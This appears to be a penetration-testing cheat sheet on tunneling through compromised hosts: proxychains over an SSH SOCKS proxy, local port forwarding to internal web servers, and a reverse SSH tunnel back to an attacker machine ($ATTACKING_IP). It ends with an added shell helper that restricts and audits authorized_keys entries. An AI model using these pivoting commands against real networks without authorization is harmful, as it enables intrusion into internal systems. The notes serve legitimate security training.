# Tunneling

## Proxychains

Comment out the **proxy\_dns** line in the **/etc/proxychains4.conf** file.

#### Create a forward proxy by connecting to a machine via SSH and binding the default Proxychains port

```bash
ssh -f -N -D 9050 root@10.10.100.2
```

* -f  backgrounds ssh
* -N  does not execute remote commands
* -D  opens a dynamic (SOCKS) proxy on local port 9050

#### Use Proxychains with commands

```bash
proxychains nmap -sC -sV -T4 10.10.200.0/24
```

```bash
proxychains xfreerdp /u:administrator /p:'Password1' /v:10.10.200.225
```

## SSH Tunneling

There are two ways to create an SSH tunnel with the SSH client: port forwarding and creating a [forward proxy](#proxychains).

### SSH Port Forwarding

Create a link to an internal webserver (172.16.0.10:80) using port **8000** and SSH access to the compromised machine (172.16.0.5).

```bash
ssh -L 8000:172.16.0.10:80 user@172.16.0.5 -fN
```

* -L  forwards the **local port** (8000) through the SSH server to the target
* -f  backgrounds the shell
* -N  no commands to be executed

You have **SSH** access to a server (172.16.0.50) with a webserver running internally on port 80 (i.e. only accessible to the server itself on 127.0.0.1:80). Forward it to port 8000 on your machine.

```bash
ssh -L 8000:127.0.0.1:80 user@172.16.0.50 -fN
```

### Reverse SSH Connection (ABSOLUTE NO NO)

Anyways..

Very **risky** but ideal if you have a shell on the compromised server but no SSH access.

Generate a new key pair

```bash
ssh-keygen
```

Copy the contents of the public key (the file ending with **.pub**), then edit the **\~/.ssh/authorized\_keys** file on your own machine. You may need to create the **\~/.ssh** directory and **authorized\_keys** file first.

Prepend these options to the key's entry in **authorized\_keys** (on the same line, separated from the key type by a space; sshd ignores options placed on a line of their own)

```
command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty
```

Start the SSH server

```bash
sudo systemctl start ssh
```

Transfer the private key and connect back to your machine

```bash
ssh -R $LOCAL_PORT:$TARGET_IP:$TARGET_PORT $USERNAME@$ATTACKING_IP -i KEYFILE -fN
```

This should mainly be used for reaching internal webapps.
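As an added example (not part of the original notes), a small POSIX shell helper for the restricted-key step above: it prefixes a `.pub` line with the port-forwarding-only options, rejects input that is not a public key, and audits an `authorized_keys` listing for entries that lack the restrictions (for instance a key pasted without its prefix). The function names and the sample key material are constructed for this example.

```shell
#!/bin/sh
# Restriction options from the notes. sshd only honours them when they sit on
# the same line as the key, before the key type.
RESTRICT="command=\"echo 'This account can only be used for port forwarding'\",no-agent-forwarding,no-x11-forwarding,no-pty"

# Constructed sample .pub content (not real key material).
SAMPLE_PUB='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleNotARealKeyMaterial000 pivot@attacker'

# restrict_pubkey "KEYLINE": print the authorized_keys entry that allows
# port forwarding only. Fails on input that does not look like a public key.
restrict_pubkey() {
  # word-split the key line into key type, base64 blob and optional comment
  set -- $1
  case "$1" in
    ssh-ed25519|ssh-rsa|ecdsa-sha2-*|sk-ssh-ed25519*|sk-ecdsa-*) ;;
    *) printf 'not a public key line: %s\n' "$1" >&2; return 1 ;;
  esac
  [ -n "$2" ] || { printf 'missing key material\n' >&2; return 1; }
  keytype=$1; keydata=$2; shift 2
  if [ $# -gt 0 ]; then
    printf '%s %s %s %s\n' "$RESTRICT" "$keytype" "$keydata" "$*"
  else
    printf '%s %s %s\n' "$RESTRICT" "$keytype" "$keydata"
  fi
}

# unrestricted_keys [FILE]: print every key entry (from FILE or stdin) that is
# missing one of the three restrictions, prefixed with its line number.
unrestricted_keys() {
  awk 'NF && $1 !~ /^#/ && !(/no-pty/ && /no-agent-forwarding/ && /no-x11-forwarding/) { print NR ": " $0 }' "$@"
}

# Usage: build the entry, then audit a constructed listing holding both forms;
# only the bare key (line 1) is reported.
restrict_pubkey "$SAMPLE_PUB"
printf '%s\n' "$SAMPLE_PUB" "$(restrict_pubkey "$SAMPLE_PUB")" | unrestricted_keys
```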
